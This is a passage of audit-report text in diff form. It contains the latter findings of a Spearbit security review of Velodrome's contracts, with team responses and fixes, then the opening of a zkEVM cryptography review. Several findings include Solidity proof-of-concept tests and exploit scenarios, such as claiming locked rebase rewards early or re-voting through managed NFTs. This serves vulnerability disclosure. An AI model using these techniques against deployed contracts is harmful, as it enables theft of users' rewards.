the attacker would be able to perform this every other week (1 week cooldown, 1 week execution). Because of how the fact that managedRewards are delayed by a week the attacker will not lose any noticeable amount of rewards, meaning that most users would rationally opt-into performing this operation to gain an unfair advantage, or to sell their rewards each week while other Lockers are unable or unwilling to perform this operation. The following POC will show an increase in VELO balance for the tokenId2 owner in spite of the fact that the lock is not expired Logs: Epoch 1 Token Locked after Token2 Locked after User Bal after 56039811453980167852 -1000000000000000000000000 // Negative because we have `depositManaged` 56039811453980167852 // We received the token directly, unvested function testInstantClaimViaManaged() public { // Proof that if we depositManaged, we can get our rebase rewards instantly // Instead of having to vest them via the lock skipToNextEpoch(1 days); minter.updatePeriod(); console2.log("Epoch 1"); VELO.approve(address(escrow), TOKEN_1M * 2); uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME); uint256 tokenId2 = escrow.createLock(TOKEN_1M, MAXTIME); uint256 mTokenId = escrow.createManagedLockFor(address(this)); skipToNextEpoch(1 hours + 1); minter.updatePeriod(); 65 skipToNextEpoch(1 hours + 1); minter.updatePeriod(); // Now we claim for 1, showing that they incease locked int128 initialToken1 = escrow.locked(tokenId).amount; distributor.claim(tokenId); // Claimed from previous epoch console2.log("Token Locked after ", escrow.locked(tokenId).amount - initialToken1); // For 2, we deposit managed, then claim, showing we get tokens unlocked uint256 initialBal = VELO.balanceOf(address(this)); int128 initialToken2 = escrow.locked(tokenId2).amount; voter.depositManaged(tokenId2, mTokenId); distributor.claim(tokenId2); // Claimed from previous epoch console2.log("Token2 Locked after ", escrow.locked(tokenId2).amount - initialToken2); console2.log("User Bal after ", VELO.balanceOf(address(this)) - initialBal); } Recommendation: At this time, it seems like the best suggestion would be to check if the token is managed, and if it is, to depositFor the managed token. Velodrome: This finding is valid and a user can in fact circumvent the rebase to their account instead of their tokenId. There are a couple key things to note here: • depositFor() into the (m)veNFT would distribute the rebase to all lockers within the (m)veNFT. • distributor.claim() is publicly callable on the behalf of any tokenId. Given these conditions, a user may unknowingly have a rebase to claim but deposit into the (m)veNFT. If we went with the proposed solution of depositFor() into (m)veNFT, a malicious caller could see this pending claim and have it distributed to everyone within the (m)veNFT. I believe the best solution would integrate distributor.claim() within depositManaged() so that the claim is automatically done and given to the rightful owner. Spearbit: Great points. A check has been added that causes a revert on claiming if the Lock is in a Managed Position that also may be sufficient. By not allowing the tokens to be distributed, they will be distributed exclusively to the lock once it's withdrawn from the managed position. This should ensure that those rebase rewards are at least unlocked at the time in which the user lock expires, which seems more in line with the design of not allowing rebase rewards to be liquid immediately. Velodrome: Right, the fix you mention is within commit 0323be. Spearbit: Fixed. 6.4 Low Risk +6.4.1 Unnecessary slippage loss due to AutoCompounder selling VELO Severity: Low Risk Context: AutoCompounder.sol#L78-L85 AutoCompounder.sol#L91-L98 Description: AutoCompounder allows every address to help claim the rewards and compound to the locked VELO position. The AutoCompounder will sell _tokensToSwap into VELO. By setting VELO as _tokensToSwap, the AutoCom- pounder would do unnecessary swaps that lead to unnecessary slippage loss. Recommendation: Checks _tokensToSwap != address(VELO) . Velodrome: Fixed in commit ffb016. Spearbit: Fixed. 66 +6.4.2 epochVoteStart function calls the wrong library method Severity: Low Risk Context: Voter.sol#L111 Description: The epochVoteStart function calls the VelodromeTimeLibrary.epochStart function instead of the VelodromeTimeLibrary.epochVoteStart function. Thus, the Voter.epochVoteStart function returns a voting start time without factoring in the one-hour distribution window, which might cause issues for users and developers relying on this information. Recommendation: Consider making the following change to the Voter.epochVoteStart function function epochVoteStart(uint256 _timestamp) external pure returns (uint256) { - return VelodromeTimeLibrary.epochStart(_timestamp); + return VelodromeTimeLibrary.epochVoteStart(_timestamp); Velodrome: Fixed in commit f7eb2f. Spearbit: Verified. +6.4.3 Managed NFT can vote more than once per epoch under certain circumstances Severity: Low Risk Context: Voter.sol#L286 Description: The owner of the managed NFT could break the invariant that an NFT can only vote once per epoch Assume Bob owns the following two (2) managed NFTs: • Managed veNFT (called mNFTa) with one (1) locked NFT (called lNFTa) • Managed veNFT (called mNFTb) with one (1) locked NFT (called lNFTb) • The balance of lNFTa and lNFTb is the same Bob voted on poolx with mNFTa and mNFTb on the first hour of the epoch At the last two hours of the voting windows of the current epoch, Bob changed his mind and decided to vote on the pooly . Under normal circumstances, the onlyNewEpoch modifier will prevent mNFTa and mNFTb from triggering the Voter.vote function because these two veNFTs have already voted in the current epoch and their lastVoted is set to a timestamp within the current epoch. However, it is possible for Bob to bypass this control. Bob could call Voter.withdrawManaged function to withdraw lNFTa and lNFTb from mNFTa and mNFTb respectively. Since the weight becomes zero, the lastVoted for both mNFTa and mNFTb will be cleared. As a result, they will be allowed to re-vote in the current epoch. Bob will call Voter.depositManaged to deposit lNFTb into mNFTa and lNFTa into mNFTb respectively to increase the weight of the managed NFTs. Bob then calls Voter.vote with mNFTa and mNFTb to vote on pooly . Since the lastVoted is empty (cleared earlier), the onlyNewEpoch modifier will not revert the transaction. Understood that the team that without clearing the lastVoted, it would lead to another potential issue where a new managed NFT could potentially be made useless temporarily for an epoch. Given the managed NFT grant significant power to the owner, the team intended to restrict access to the managed NFTs and manage abuse by utilizing the emergency council/governor to deactivate non-compliant managed NFTs, thus mitigating the risks of this issue. Recommendation: To prevent any managed NFT owner from abusing this issue, consider disallowing re-voting in the current epoch once the last NFT has been withdrawn from a managed NFT. Velodrome: This potential interaction was built from commit 6b95f9 and is going to remain in the codebase. We acknowledge there is a risk of vote signaling abuse by changing the vote last second. However, there is a greater 67 risk to the managed veNFT holder losing their ability to vote if lockers decide to withdraw from the (m)veNFT. In signaling abuse, trust is given to the (m)veNFT voter, the same user who has the power to vote. In disallowing re- voting, trust is given to the lockers, of whom the (m)veNFT voter has no control over. We understand the additional economics of (m)veNFT vote changes and intend to create (m)veNFT on a partner-by-partner basis. If this voting change is abused by a partner the team is able to disable the (m)veNFT from voting again. Spearbit: Acknowledged. +6.4.4 Invalid route is returned if token does not have a trading pool Severity: Low Risk Context: CompoundOptimizer.sol#L79 Description: Assume that someone called the getOptimalTokenToVeloRoute function with a token called T that does not have a trading pool within Velodrome. While looping through all the ten (two) routes pre-defined in the constructor at Line 94 below, since the trading pool with T does not exist, it will keep skipping to the next route until the loop ends. As such, the index remains uninitialized at the end, meaning it holds the default value of zero. In Lines 110 to 112, it will conclude that the optimal route is as follows: routes[0] = routesTokenToVelo[index][0] = routesTokenToVelo[0][0] = address(0) <> USDC routes[1] = routesTokenToVelo[index][1] = routesTokenToVelo[0][1] = USDC <> VELO routes[0].from = token = T routes = T <> USDC <> VELO As a result, the getOptimalTokenToVeloRoute function returns an invalid route. function getOptimalTokenToVeloRoute( address token, uint256 amountIn ) external view returns (IRouter.Route[] memory) { // Get best route from multi-route paths uint256 index; uint256 optimalAmountOut; IRouter.Route[] memory routes = new IRouter.Route[](2); uint256[] memory amountsOut; // loop through multi-route paths for (uint256 i = 0; i < 10; i++) { routes[0] = routesTokenToVelo[i][0]; // Go to next route if a trading pool does not exist if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) continue; ,! routes[1] = routesTokenToVelo[i][1]; // Set the from token as storage does not have an address set routes[0].from = token; amountsOut = router.getAmountsOut(amountIn, routes); // amountOut is in the third index - 0 is amountIn and 1 is the first route output uint256 amountOut = amountsOut[2]; if (amountOut > optimalAmountOut) { // store the index and amount of the optimal amount out optimalAmountOut = amountOut; index = i; } } // use the optimal route determined from the loop routes[0] = routesTokenToVelo[index][0]; routes[1] = routesTokenToVelo[index][1]; routes[0].from = token; // Get amountOut from a direct route to VELO IRouter.Route[] memory route = new IRouter.Route[](1); 68 route[0] = IRouter.Route(token, velo, false, factory); amountsOut = router.getAmountsOut(amountIn, route); // compare output and return the best result return amountsOut[1] > optimalAmountOut ? route : routes; } Recommendation: If none of the routes support the token, consider reverting the transaction instead of returning a route built upon an uninitialized index. + bool routeFound = false; for (uint256 i = 0; i < 10; i++) { routes[0] = routesTokenToVelo[i][0]; // Go to next route if a trading pool does not exist - if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) continue; if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) { continue; } else { routeFound = true; ,! + + + + + } ..SNIP.. } + if (!routeFound) revert NoRouteFound(); Velodrome: Fixed in commit 367ecf. Spearbit: Verified. +6.4.5 SafeApprove is not used in AutoCompounder Severity: Low Risk Context: AutoCompounder.sol#L186 AutoCompounder.sol#L109 Description: safeApprove is not used in AutoCompounder. Tokens that do not follow standard ERC20 will be locked in the contract. Recommendation: Use safeApprove and clear the allowance before calling token contracts. IERC20(token).safeApprove(address(router), 0); IERC20(token).safeApprove(address(router), balance); Velodrome: Fixed in commit 10ae5c. Spearbit: Verified. +6.4.6 balanceOfNFT can be made to return non-zero value via split and merge Severity: Low Risk Context: VotingEscrow.sol#L1059-L1060 Description: Ownership Change Sidestep via Split. Splitting allows to change the ID, and have it work. This allows to sidestep this check in VotingEscrow.sol#L1052-L1055 Meaning you can always have a non-zero balance although it requires performing some work. This could be used by integrators as a way to accurately track their own voting power. Recommendation: At this time, no specific vulnerability was found besides the ability to sidestep this view func- tion, so no action seems to be required beside flagging this to future integrators. 69 Velodrome: A couple things here: • In merge, one veNFT is burned and the other increases balance. In split, two fresh veNFTs are minted to the owner of the split veNFT, and the split veNFT is burned. • Ownership change tracking are solely done to protect against flash-voting from transferFrom(). It's worth acknowledging that yes, from these functions the locked balance changes. However, I do not see a vulnerability from these functions. Spearbit: By performing a split and merge you'd be able to vote in the same block, however, you'd be doing so by breaking the lock and using another tokenId. Something important to consider around flashloans with splitting, is that you could split the token to leave a dust amount (but maintain the tokenId) and you'd be able to vote because the newly create tokenId would not have ownershipChange set We weren't able to use this to bypass anything meaningful besides being able to use _delegate or balanceOf in the same tx / block as the transferFrom +6.4.7 delegateBySig can use malleable signatures Severity: Low Risk Context: VotingEscrow.sol#L1202-L1203 Description: Because the function delegateBySig uses ecrecover and doesn't check for the value of the sig- nature, other signatures, that have higher numerical values, which map to the same signature, could be used. Because the code uses nonces only one signature could be used per nonce. Recommendation: Consider using ECDSA by Open Zeppelin, or adding the check they use here. Velodrome: Fixed in commit ebe3af. Spearbit: Fixed. +6.4.8 Slightly Reduced Voting Power due to Rounding Error Severity: Low Risk Context: BalanceLogicLibrary.sol#L99-L100 Description: Because of rounding errors, a fully locked NFT will incur a slight loss of Vote Weight (around 27 BPS). [PASS] testCompareYieldOne() (gas: 4245851) Logs: distributor.claimable(tokenId) 0 locked.amount 1000000000000000000000000 block.timsestamp 1814399 block.timsestamp 1900800 Epoch 2 distributor.claimable(tokenId) 0 locked.amount 1000000000000000000000000 escrow.userPointHistory(tokenId, 1) 0 escrow.userPointHistory(tokenId, 1) 1814399 escrow.userPointHistory(tokenId, 1) BIAS 997260281900050656907546 escrow.userPointHistory(tokenId, tokenId2) 1814399 escrow.userPointHistory(tokenId, tokenId2) BIAS 997260281900050656907546 userPoint.ts 1814399 getCursorTs(tokenId) 1814400 userPoint.ts 1814399 epochStart(tokenId) 1814400 70 userPoint.ts 1814399 ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1) 997260281900050656907546 function getCursorTs(uint256 tokenId) internal returns(uint256) { IVotingEscrow.UserPoint memory userPoint = escrow.userPointHistory(tokenId, 1); console2.log("userPoint.ts", userPoint.ts); uint256 weekCursor = ((userPoint.ts + WEEK - 1) / WEEK) * WEEK; uint256 weekCursorStart = weekCursor; return weekCursorStart; } function epochStart(uint256 timestamp) internal pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK); } } function testCompareYieldOne() public { skipToNextEpoch(1 days); // Epoch 1 skipToNextEpoch(-1); // last second VELO.approve(address(escrow), TOKEN_1M * 2); uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME); uint256 tokenId2 = escrow.createLock(TOKEN_1M, 4 * 365 * 86400); uint256 mTokenId = escrow.createManagedLockFor(address(this)); console2.log("distributor.claimable(tokenId)", distributor.claimable(tokenId)); console2.log("locked.amount", escrow.locked(tokenId).amount); console2.log("block.timsestamp", block.timestamp); minter.updatePeriod(); // Update for 1 skipToNextEpoch(1 days); // Go next epoch minter.updatePeriod(); // and update 2 console2.log("block.timsestamp", block.timestamp); console2.log("Epoch 2"); //@audit here we have claimable for tokenId and mTokenId IVotingEscrow.LockedBalance memory locked = escrow.locked(tokenId); console2.log("distributor.claimable(tokenId)", distributor.claimable(tokenId)); console2.log("locked.amount", escrow.locked(tokenId).amount); console2.log("escrow.userPointHistory(tokenId, 1)", escrow.userPointHistory(tokenId, 0).ts); console2.log("escrow.userPointHistory(tokenId, 1)", escrow.userPointHistory(tokenId, 1).ts); console2.log("escrow.userPointHistory(tokenId, 1) BIAS", escrow.userPointHistory(tokenId, 1).bias); ,! console2.log("escrow.userPointHistory(tokenId, tokenId2)", escrow.userPointHistory(tokenId2, 1).ts); ,! console2.log("escrow.userPointHistory(tokenId, tokenId2) BIAS", ,! escrow.userPointHistory(tokenId2, 1).bias); console2.log("getCursorTs(tokenId)", getCursorTs(tokenId)); console2.log("epochStart(tokenId)", epochStart(getCursorTs(tokenId))); console2.log("ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)", ,! escrow.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)); } 71 Recommendation: A nofix seems acceptable given the ability for end users to use permanent locks. Since these types of locks offer 100% of the voting power, they may be the preferred option for end users. Velodrome: The team is aware of this and has kept it intentionally to encourage permanent locks. Spearbit: Acknowledged. +6.4.9 Some setters cannot be changed by governance Severity: Low Risk Context: Voter.sol#L151-L155 Description: It was found that some setters, related to emergencyCouncil and Team can only be called by the current role owner. It may be best to allow Governance to also be able to call such setters as a way to allow it to override or replace a misaligned team. The Emergency Council can kill gauges, preventing those gauges from receiving emissions. Voter.sol#L151-L155. function setEmergencyCouncil(address _council) public { if (_msgSender() != emergencyCouncil) revert NotEmergencyCouncil(); if (_council == address(0)) revert ZeroAddress(); emergencyCouncil = _council; } The team can simply change the ArtProxy which is a cosmetic aspect of Voting Escrow. VotingEscrow.sol#L241-L245 function setTeam(address _team) external { if (_msgSender() != team) revert NotTeam(); if (_team == address(0)) revert ZeroAddress(); team = _team; } Recommendation: Consider allowing Governance to change the addresses with the roles. Velodrome: This design is intentional to prevent a governance takeover. There is always the ability to give governance the team role once governance has been properly established. Spearbit: Acknowledged. +6.4.10 Rebase Rewards distribution is shifted by one week, allowing new depositors to receive unfair yield initially (which they'll give back after they withdraw) Severity: Low Risk Context: Reward.sol#L187-L188 Description: The finding is not particularly dangerous but it is notable that because Reward will allow claiming of rewards on the following Epoch, and because Rebase rewards from the Distributor Distributor.claim are distributed based on the balance at the last second of the previous epoch, a desynchronization in how rewards are distributed will happen. This will end up being fair in the long run however here's an illustrative scenario: • Locker A has a small lock, they wish to increase the amount they have locked. • They increase the amount but miss out on rebase rewards (because they are based on their balance at the last second of the previous epoch). • They decide to depositManaged which will distribute rewards based on their current balance, meaning they will "steal" a marginal part of the yield. 72 • The next epoch, their weight will help increase the yield for everyone, and because Rebasing Rewards are distributed with a week of delay, they will eventually miss out on a similar proportion of yield they "stole". Recommendation: Consider documenting the behavior in the user documentation. Velodrome: Managed nfts are intended to be used as long-term vehicles for compounding/farming. We think this is an acceptable trade-off for automation and it does even out over time. Spearbit: Acknowledged. +6.4.11 AutoCompounder can be created without admin Severity: Low Risk Context: AutoCompounderFactory.sol#L40 Description: Creating an AutoCompounder contract without an _admin by passing address(0) through AutoCom- pounderFactory is possible. This will break certain functionalities in the AutoCompounder. Recommendation: It is recommended to add a check to the _admin parameter. Velodrome: Fix commit 74130d. Spearbit: Fixed. +6.4.12 claim and claimMany functions will revert when called in end lock time Severity: Low Risk Context: RewardsDistributor.sol#L136, RewardsDistributor.sol#L161 Description: block.timestamp >= oldLocked.end. If _timestamp == _locked.end, then depositFor() will be called but this will revert as Recommendation: It is recommended to change the validation for the following code - if (_timestamp > _locked.end && !_locked.isPermanent) { + if (_timestamp - 1 > _locked.end && !_locked.isPermanent) { Velodrome: Fix commit 3aa5bf. Opted to keep the same value comparison of VotingEscrow and used if(timestamp >= _locked.end ... Spearbit: Fixed. +6.4.13 Malicious Pool Factory can be used to prevent new pools from being voted on as well as brick voting locks Severity: Low Risk Context: Voter.sol#L322-L381 Description: Because gauges[_pool] can only be set once in the voter, governance has the ability to introduce a malicious factory, that will revert on command as a way to prevent normal protocol functionality as well as prevent depositors that voted on these from ever being able to unlock their NFTs • ve.withdraw requires not having voted. • To remove voting reset is called, which in turn calls IReward(gaugeToFees[gauges[_pool]])._with- draw(uint256(_votes), _tokenId);. • If a malicious gaugeToFees contract is deployed, the tokenId won't be able to ever set voted to false preventing the ability from ever withdrawing. 73 Recommendation: It's worth ensuring that no such malicious factory is introduced, which can be achieved by setting up proper gauges initially for most pools. To ensure this doesn't happen in the future, initially, vetoing governance proposals may be necessary until sufficient decentralization is achieved. Velodrome: It is worth acknowledging the risks of governance and upgradeability within Voter. There is a possi- bility of a "bad" gauge being created which could freeze the votes of a veNFT, and new gauge creation requires the diligence of the team and users to prevent this exploit from happening. Aside of the assumptions mentioned above, there are several steps already in place to additionally support the intended experience of the protocol: • Fallback factories to ensure there is always a trusted gauge for a set of tokens. • FE management by team to display only legitimate gauges. Monitoring is definitely needed to ensure governance works as intended. Fortunately, in this case, even after a "bad" gauge is created, a user is not at risk until they submit a transaction depositing into the new gauge. Spearbit: Acknowledged. +6.4.14 Pool will stop working if a pausable / blockable token is blocked Severity: Low Risk Context: Pool.sol Description: Some tokens are pausable or implement a block list (e.g. USDC), if such a token is part of a Pool, and the Pool is blocked, the Pool will stop working. It's important to notice that the LP token, which wraps a deposit will still be transferable and the composability with Gauges and Reward Contracts will not be broken even when the pool is unable to function. Recommendation: It may be best to disclose such risks in the documentation, however, these are inherent risks with using such tokens (USDC included) and are not specifically attributable to the code in-scope. Velodrome: Acknowledged. Pausing a token would prevent LPs from withdrawing, freeze swaps, and block all claimable rewards of the token. Spearbit: Acknowledged. 6.5 Gas Optimization +6.5.1 Use ClonesWithImmutableArgs in AutoCompounderFactory saves gas Severity: Gas Optimization Context: AutoCompounderFactory.sol#L40 Description: The AutoCompounderFactory can utilize ClonesWithImmutableArgs to deploy new AutoCompounder contracts. This would save a lot of gas compared to the current implementation. Recommendation: It is recommended to use the ClonesWithImmutableArgs library Spearbit: This is an audit that was done by Spearbit using the same library: spearbit-audit-amm.pdf For the sake of transparency a recent exploit related to upgrades and clones was found in Astaria, it's worth checking the post-mortem once made available: AstariaXYZ twitter Velodrome: Okay, thank you for sharing. We will leave the code as-is. No gas optimization is worth any change in protocol security. Spearbit: Acknowledged. 74 +6.5.2 Convert hardcoded route to internal function in CompoundOptimizer Severity: Gas Optimization Context: CompoundOptimizer.sol#L37-L75 Description: All of the hardcoded route setups can be converted to an internal function with hardcoded values. Recommendation: The recommendation is to convert all of the hardcoded route setups to an internal function with hardcoded values. Velodrome: Implemented commit 505626. Spearbit: Fixed. +6.5.3 Early return in supplyAt save gas Severity: Gas Optimization Context: BalanceLogicLibrary.sol#L120-L122 Description: To save gas, you can return in case of _epoch is equal to zero can be made before cache _point. Recommendation: It is recommended to return before cache _point. Velodrome: Code change commit d323b0 Spearbit: Fixed. 6.6 Informational +6.6.1 Approved User could Split NFTs and be unable to continue operating Severity: Informational Context: VotingEscrow.sol#L973-L974 Description: An approved user can be approved via approve, the storage value set is idToApprovals[_tokenId] = _approved; Splitting will create two new NFTs that will be sent to the owner. This means that an approved user would be able to split the NFTs on behalf of the owner, however, in doing so they would lose ownership of the NFTs, being unable to continue using them during the TX Recommendation: This is at most a gotcha to integrators, so there's no particular risk. Velodrome: Updated docs commit d912a1. Spearbit: Fixed. +6.6.2 Add sweep function to CompoundOptimizer Severity: Informational Context: CompoundOptimizer.sol Description: Some tokens may be completely illiquid, may not be worth auto-compounding so it would be best to also allow a way to sweep tokens out to the owner for some tokens. Examples: • Airdrops / Extra rewards. • Very new tokens that the owner wants to farm instead of dump. Recommendation: It is recommended to create a sweep functionality. Velodrome: We will implement a sweep solution in which the team manages a list of tokens that cannot be swept. Tokens that cannot be swept are tokens with high liquidity (USDC, DAI, etc.). This list can only be added to, not 75 removed from, for additional trust. The admin is allowed to sweep any tokens that are not on this list within the first 24 hours after the epoch flip. Trusted keepers will not be able to swap any tokens within the first 24 hours to prevent a race to sweep. Spearbit: Acknowledged. +6.6.3 Allow Manual Suggestion of Pair in AutoCompounder Severity: Informational Context: CompoundOptimizer.sol#L79-L82 Description: Allow manual suggestion of token pairs such as USDC, USDT, LUSD, and wBTC. It may be best to pass a list of pairs as parameters to check for additional tokens. Ultimately, if a suggested pair offers a better price, there's no reason not to allow it. The caller should be able to pass a suggested optimal route, which can then be compared against other routes. Use whichever route is best. If the user's suggested route is the best one, use theirs and ensure that the swap goes through. Recommendation: One possible solution to this problem would be to implement a way for the caller to pass a suggested optimal route, which can then be compared against other routes. Velodrome: Acknowledged. Spearbit: Acknowledged. +6.6.4 Check if owner exists in split function Severity: Informational Context: VotingEscrow.sol#L955 Description: In case the NFT does not exist, the _ownerOf(_from) function returns the zero address. This check is satisfied if canSplit has been toggled. However, this does not lead to any issues because the _- isApprovedOrOwner() check will revert as intended, and there is no amount in the lock. It may be a good idea to update the _ownerOf() function to revert if there is no owner for the NFT. Recommendation: It is recommended to check the ownerOf different from address(0) function split( uint256 _from, uint256 _amount ) external nonReentrant returns (uint256 _tokenId1, uint256 _tokenId2) { address sender = _msgSender(); address owner = _ownerOf(_from); + if(owner == address(0)) revert SplitNoOwner if (!canSplit[owner] && !canSplit[address(0)]) revert SplitNotAllowed(); ... } Velodrome: Implemented commit 197c8d. Spearbit: Fixed. +6.6.5 Velo and Veto Governor do not use MetaTX Context Severity: Informational Context: Velo.sol#LL5C67-L5C68 Description: These two contracts use Context instead of ERC2771Context. Recommendation: At this time I'd recommend not to change the code, Velo can still be moved via permit, which is effectively the same as allowing metaTXs. 76 Velodrome: Acknowledged. Spearbit: Acknowledged. +6.6.6 SinkManager is depositing to Gauge without using the TokenId Severity: Informational Context: SinkManager.sol#L238 Description: gauge.deposit allows to specify a tokenId, but the field is unused Recommendation: I believe a nofix to completely fine. Velodrome: Acknowledged. There is no risk in leaving the argument empty. The v1 gauge takes in the token argument Gauge.sol#L457 only to populate the tokenIds mapping within the Gauge (which is never utilized) and ensure the gauge is alive via voter.attachTokenToGauge() (which it will be). Will leave as-is. Spearbit: Acknowledged. 77 diff --git a/findings_newupdate/spearbit/zkEVM-Cryptography-Spearbit-27-March.txt b/findings_newupdate/spearbit/zkEVM-Cryptography-Spearbit-27-March.txt new file mode 100644 index 0000000..00356cf --- /dev/null +++ b/findings_newupdate/spearbit/zkEVM-Cryptography-Spearbit-27-March.txt @@ -0,0 +1,7 @@ +4.1.1 Documents Reviewed • PIL – Polynomial Identity Language (PIL): A Machine Description Language for Verifiable Computation – v1.0, February 13 2023 • eSTARK – eSTARK: Extending the STARK Protocol with Arguments – v1.0, February 10, 2023 – v1.2, March 15 2023 • Recursion – Recursion, aggregation, and composition of proofs – v1.0 February 13 2023 • fflonk – fflonk: a Fast-Fourier inspired verifier efficient verson of PlonK – ePrint Archive – Polygon Documentation (February 20 2023) +4.1.2 PIL + eSTARK Definition of Connection argument is inconsistent between the PIL and eSTARK v1.0 documents (Informa- tional) The connection argument in Section 1.5 of eSTARK is meant to be identical to Section 1.9, Definition 4 of the PIL document (labeled Multi-Column Copy-Satisfiability). However, Section 1.9, Definition 3 (labeled Connec- tion Argument) refers to the Single-Column variant. • Suggestion: In the PIL documentation, label Definition 3 to be the Single-Column Connection Argument and specify in the eSTARK documentation in Section 1.5 the description of the Multi-Column Connection Argument. Definition of Connection argument in eSTARK v1.0 contains inconsistent definition of partition (Inconsis- tency) The connection argument in Section 1.5 of the eSTARK document defines a partition T={T1,...,Tk}. This implies that T1,...Tk are partition sets. However, there is no need to limit the number of partition sets to k. As described in Section 1.4, Definition 4 of the PIL document, the number of columns can (and usually will) differ from the number of partition sets. We believe this might be the result of a mixup of the partition sets and the vectors that will be used to encode the partition permutation. The number of vectors encoding the partition permutation is the same as the number of columns. • Concern Addressed: The Polygon team has addressed this concern with version eSTARK v1.2. In Sec- Unconstrained selectors in selection variants of lookup and multiset equality arguments (Minor) tion 2.4 of the eSTARK document v1.0, step 1 states that the prover sends over the selector polynomials. There are two potential issues here: 1. If the verifier does not take in the selector polynomials as constant (preprocessed) polynomials, then the relation is trivially satisfiable. The prover can simply set the selectors to be identically 0. Thus, the Selected Vector Argument is meaningless. 2. Further, beyond the trivial satisfying selection described above, if the prover is meant to send their own selectors, there is no verification check to confirm the image of the selector polynomials over G is {0,1}. 4 • Suggestion: A self-contained description of the Selected Vector Argument should include a verification check that the selector polynomials lie in {0,1} over G. • Concern Addressed: The Polygon team informed us that in the zkEVM context, additional constraints exist to ensure the selector polynomials are in {0,1} when they are prover provided, i.e., they are the result of a lookup from a preprocessed table that only contains {0,1}. Misuse of Poseidon hashing for verifier challenges resulting in unexploitable length-extension weakness In Section 2.2 of the eSTARK documentation v1.0, the strategy to produce a third verifier challenge from (Minor) the 7th, 8th, and 9th field elements requires producing a new set of 8 field elements (the 9th field element is not contained in the previous set). To do this, 8 zeroes are hashed with the previous capacity. This approach produces the same outputs as if hashing the message appended with 8 zeroes: M||00000000. • Suggestion: While this particular instance of misuse as used in the STARK prover may not cause issues as the inputs to the transcript may not be length-extended, we recommend that additional verifier challenges are produced by treating the Poseidon hash function as an XOF for continuous variable-length output. Feed the full 12 elements (capacity + output) into another round of Poseidon permutation. Then use the top 8 (without the capacity) as partial output, repeating as needed. This mimics the squeeze operation of a sponge hash function. Using Poseidon with XOF mode allows for producing as many verifier challenges as needed (Optimization) A number of design decisions are made in eSTARK v1.0 to bound the number of verifier challenges needed. We do not believe there any concerns with the soundness of the proposed design decisions, however if these design decisions were made due to the concern around the feasibilty of generating additional verifier challenges, then this can be avoided. Instead if reducing the number of verifier challenges is already an optimization to reduce the size of the STARK verifier in the recursion, then the following can be ignored. 1. Section 2.2 of the eSTARK documentation v1.0 claims that there is a bound on the number of verifier chal- lenges that can be produced. 2. Section 2.5 of the eSTARK documentation v1.0 claims that the large number of verifier challenges needed to produce the quotient polynomial are hard to produce. 3. Section 2.7 of the eSTARK documentation v1.0 claims that the large number of verifier challenges needed to produce the FRI polynomial is an issue. • Suggestion: All of the above is not an issue using the XOF mode with Poseidon as described above. • Concern Addressed: The Polygon team confirmed that the proposed designs to reduce the number of verifier challenges was not because of perceived infeasibility of producing more verifier challenges, rather it is an optimization to minimize the recursive circuit avoiding additional encodings of Poseidon rounds. In the description of the full Preprocessed polynomials not included in first prover message (Informational) protocol in Section 4.5 Round 1 of the eSTARK paper v1.2, the preprocessed polynomials are not included in the Merkle tree commitment. • Suggestion: Include the preprocessed polynomials in the first prover message as described in earlier sec- tions. 5 +4.1.3 Recursion In Section 4.2.6 of the recursion Description of rootC used and depicted inconsistently (Inconsistency) document, in Figure 17, the public input rootC is supposed to be multiplexed with a hard-coded rec1 rootC. The paragraph before has some description mistakes. • Suggestion: Follow the diagram from Jordi’s slides that includes the hard-coded rootC and input rootC as argument to the multiplexor fed to both verifiers. +4.1.4 fflonk Minor soundness bound error (Informational) There is an off-by-one error int he soundness bound for the proof of Lemma 6.4. Note that A | (p − 1) where p is the size of F . The set S of A-th powers of F includes 0. Thus, |S| = p−1 A + 1. Let Fi be a non-zero polynomial. For a uniformly chosen element of s in S, the probability fi (s) = 0 ≤ def Fi p−1 A + 1 < def(Fi ) · A p − 1 4.2 Code Review +4.2.1 Scope of Code Review Code Reviewed 1. Recursion pipeline • Repository: zkevm-proverjs at branch v0.8.0.0-rc.2-forkid.2 • Build documentation • The generated STARK verifiers in the recursion pipeline for c12a, rec1, rec2, recf, and fflonk. 2. STARK prover and verifier for PIL • Repository: pil-stark • Files: stark_gen, stark_setup, stark_verify, starkinfo, starkinfo_cp_prover, starkinfo_cp_verifier, stark- info_fri_prover, starkinfo_fri_verifier, starkinfo_step1, starkinfo_step2, transcript • The STARK proof generation and verification code for a given PIL description including encoding of lookup, multiset equality, and connection arguments. Future Code Reviews While the scope of the broader zkEVM security review included a complete code review of all cryptography related parts of the zkEVM, the code review of the following parts have not been done yet (at the time this report was written) but will be completed in the near future. 1. Compilation of PIL file to data structure input to STARK prover • Repository: pilcom 2. Encoding of PIL-derived STARK verifier to circom 3. Encoding of circom-produced R1CS to PlonK-like PIL 4. FRI (batched) polynomial commitment and opening 6 +4.2.2 Recursion Pipeline Following the latest build documentation provided, we built zkevm-proverjs on branch v0.8.0.0-rc.2-forkid.2. We checked that all the circom files aligned with out analysis of the recursion pipeline as described in the recursion documentation. Additionally, we reviewed the final fflonk verifier in Solidity. Build and documentation mismatch (Minor) The final.fflonk.verifier.sol produced by zkevm-proverjs on branch v0.8.0.0-rc.2-forkid.2 uses an outdated template from snarkjs before this commit. This outdated template does not appropriately calculate verifier challenges (does not include preprocessed polynomials and does not keep a continuous transcript state). Further the documentation provided in the README is outdated. • Suggestion: The Polygon team should double check the release version of zevm-proverjs uses the updated template otherwise the produce fflonk verifier may have Fiat-Shamir vulnerabilities. • Suggestion: Use the updated documentation provided by Felicia. • Concern Addressed: The Polygon team confirmed that they are using the correct version in their release build pipeline. In the recursive2 circuit, a mux is used to select whether a Batch number comparison logic overflow (Minor) hardcoded root or public input root is passed into the subverifier circuits. In the recursivef circuit, a mux is used to select which of two hardcoded roots is passed to the subverifier. Both muxes take in as input a comparison of the form: component test = IsZero(); test.in <== oldBatchNum - newBatchNum -1; .... mux.s <== test.out; Since the bn128 scalar field is larger than the goldilocks field, there is a potential that overflows occur in the field arithmetic above. This would affect the comparison logic above done over the goldilocks 